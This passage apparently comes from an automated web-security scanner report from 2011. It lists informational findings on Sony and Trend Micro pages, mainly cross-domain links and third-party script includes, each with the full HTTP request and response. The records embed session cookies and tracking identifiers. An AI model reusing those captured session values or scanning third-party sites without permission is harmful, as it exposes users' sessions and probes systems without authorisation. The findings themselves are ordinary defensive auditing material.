GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:23:42 GMT Content-Length: 36056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]... <link href="/css/AutoComplete.css" rel="stylesheet" type="text/css" media="screen" />--><link href="https://f.fontdeck.com/s/css/zH28mslJNSfrEtk/N8vkA5GMvEQ/*.ca.com/6172.css" rel="stylesheet" type="text/css"/> <link href="/css/base.css" rel="stylesheet" type="text/css" media="screen"/>...[SNIP]... <link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />--><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"> </script>...[SNIP]...
12.10. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_appFooter.jsp
Issue detail
The page was loaded from a URL containing a query string:http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 The response contains the following link to another domain:http://www.learningcenter.sony.us/home.php
Request
GET /selfservice/common/viewdocument_appFooter.jsp?externalId=http--supportmicrosoftcom-kb-188175&docType=kc&cmd=displayKC&dialogID=328792985&docTypeID=DT_MICROSOFTKB_1_1&stateId=1+0+328800294 HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 2794 Date: Tue, 06 Sep 2011 18:51:21 GMT <html> <head> <title>Search Results Page</title> <link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet"> </head> <body bgcolor="#FFFFFF" text=...[SNIP]... </A> <A onmouseover=" window.status='Learn about the latest Sony products at the Learning Center.'; return true" onmouseout="window.status=' '; return true" href="http://www.learningcenter.sony.us/home.php" target=_blank> Learning Center</A>...[SNIP]...
12.11. http://www.kb.sony.com/selfservice/microsites/search.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/microsites/search.do
Issue detail
The page was loaded from a URL containing a query string:http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 The response contains the following link to another domain:
Request
GET /selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294 HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=FF275CC3415E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"}}
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 6646 Date: Tue, 06 Sep 2011 18:51:20 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <HTML> <head> <title> View Document </title> <script type="text/...[SNIP]... <body> One must have a frames-capable browser to use Knova Case Response. Get one here: <a href="http://mozilla.org"> http://mozilla.org</a>...[SNIP]...
12.12. http://www.kb.sony.com/selfservice/microsites/searchEntry.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/microsites/searchEntry.do
Issue detail
The page was loaded from a URL containing a query string:http://www.kb.sony.com/selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US The response contains the following link to another domain:http://www.learningcenter.sony.us/home.php
Request
GET /selfservice/microsites/searchEntry.do?locale=LA_eng_US&usemicrosite=true®ion=UMRE_UNITEDSTATES_2_5&sonyregion=US&searchString=dvd%20mp3&product=&sonytemplate=&sonymodel=&language=en_US HTTP/1.1 Host: www.kb.sony.com Proxy-Connection: keep-alive Referer: http://esupport.sony.com/US/perl/index.pl User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%7D; fsr.a=1315353067536
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Date: Tue, 06 Sep 2011 18:51:06 GMT Content-Length: 172584 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Search Results</title> <meta http-equi...[SNIP]... </A> <A onmouseover=" window.status='Learn about the latest Sony products at the Learning Center.'; return true" onmouseout="window.status=' '; return true" href="http://www.learningcenter.sony.us/home.php" target=_blank> Learning Center</A>...[SNIP]...
13. Cross-domain script include
previous
next
There are 21 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
13.1. http://blog.trendmicro.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share http://widgets.twimg.com/j/2/widget.js
Request
GET /?p=12640 HTTP/1.1 Host: blog.trendmicro.com Proxy-Connection: keep-alive Referer: http://us.trendmicro.com/us/search/?q=xss&search.x=2&search.y=10&search=search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Content-Type: text/html; charset=UTF-8 Pragma: no-cache X-Pingback: http://blog.trendmicro.com/xmlrpc.php test : test X-Mobilized-By: WordPress Mobile Pack 1.2.4 Link: <http://blog.trendmicro.com/12640>; rel=shortlink Link: <http://blog.trendmicro.com/?p=12640>; rel=shortlink X-Varnish: 1696291508 Content-Length: 55144 Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 06 Sep 2011 18:16:26 GMT Date: Tue, 06 Sep 2011 18:16:26 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http:...[SNIP]... </script><script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... </div> <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </div>--><script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... </script><script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.2. http://blog.trendmicro.com/a-snapshot-of-android-threats-infographic/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/a-snapshot-of-android-threats-infographic/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share http://widgets.twimg.com/j/2/widget.js
Request
GET /a-snapshot-of-android-threats-infographic/ HTTP/1.1 Host: blog.trendmicro.com Proxy-Connection: keep-alive Referer: http://blog.trendmicro.com/?p=12640 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.1.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=1; bn_u=6923713914570485926; CMAVID=50021315153052143970353; cmRS=&t1=1315350993766&t2=-1&t3=1315350994638<i=1315350994637&ln=&hr=/a-snapshot-of-android-threats-infographic/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/%3Fp%3D12640&rf=http%3A//us.trendmicro.com/us/search/%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22t%22%3A1315350994642%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fa-snapshot-of-android-threats-infographic%2F%22%2C%22l%22%3A%22A%20Snapshot%20of%20Android%20Threats%20%5BINFOGRAPHIC%5D%22%2C%22de%22%3A%7B%22su%22%3A%22XSS%20(Cross-Site%20Scripting)%20Very%20Much%20Alive%20and%20Kicking%20We%20were%20about%20to%20investigate%20further%20on%20malicious%20activities%20related%20to%20banner82(dot)com%2Fb.js%20but%20the%22%2C%22ti%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22nw%22%3A1098%2C%22nl%22%3A107%7D%7D
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Content-Type: text/html; charset=UTF-8 Pragma: no-cache X-Pingback: http://blog.trendmicro.com/xmlrpc.php test : test X-Mobilized-By: WordPress Mobile Pack 1.2.4 Link: <http://blog.trendmicro.com/36257>; rel=shortlink Link: <http://blog.trendmicro.com/?p=36257>; rel=shortlink X-Varnish: 1696291652 Content-Length: 57514 Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 06 Sep 2011 18:16:33 GMT Date: Tue, 06 Sep 2011 18:16:33 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http:...[SNIP]... </script><script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... </div> <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </div>--><script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... <!-- event tracking for this event is off --><script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.3. http://blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/blackhat-2011-dangers-of-embedded-web-servers/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://static.ak.fbcdn.net/connect.php/js/FB.Share http://widgets.twimg.com/j/2/widget.js
Request
GET /blackhat-2011-dangers-of-embedded-web-servers/ HTTP/1.1 Host: blog.trendmicro.com Proxy-Connection: keep-alive Referer: http://blog.trendmicro.com/?s=xss&Submit=+Go+ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.4.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=4; bn_u=6923713914570485926; cmRS=&t1=1315351014612&t2=-1&t3=1315351015662&t4=1315351013744<i=1315351015662&ln=&hr=/blackhat-2011-dangers-of-embedded-web-servers/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/%3Fs%3Dxss%26Submit%3D+Go+&rf=http%3A//blog.trendmicro.com/category/exploits/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fs%3Dxss%26Submit%3D%2BGo%2B%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22t%22%3A1315351015665%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fblackhat-2011-dangers-of-embedded-web-servers%2F%22%2C%22l%22%3A%22Blackhat%202011%3A%20Dangers%20of%20Embedded%20Web%20Servers%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%20results%20for%3A%20Xss%20%7C%20TrendLabs%20%7C%20Malware%20Blog%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A513%2C%22nl%22%3A120%7D%7D
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Content-Type: text/html; charset=UTF-8 Pragma: no-cache X-Pingback: http://blog.trendmicro.com/xmlrpc.php test : test X-Mobilized-By: WordPress Mobile Pack 1.2.4 Link: <http://blog.trendmicro.com/36136>; rel=shortlink Link: <http://blog.trendmicro.com/?p=36136>; rel=shortlink X-Varnish: 1696292094 Content-Length: 54989 Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Tue, 06 Sep 2011 18:16:53 GMT Date: Tue, 06 Sep 2011 18:16:53 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profile="http:...[SNIP]... </script><script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'> </script>...[SNIP]... </div> <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"> </script>...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </div>--><script src="http://widgets.twimg.com/j/2/widget.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script>...[SNIP]... <!-- event tracking for this event is off --><script src='//libs.coremetrics.com/eluminate.js'> </script>...[SNIP]...
13.4. http://blog.trendmicro.com/category/exploits/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/category/exploits/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1 http://edge.quantserve.com/quant.js http://libs.coremetrics.com/eluminate.js http://platform.twitter.com/widgets.js http://widgets.twimg.com/j/2/widget.js
Request
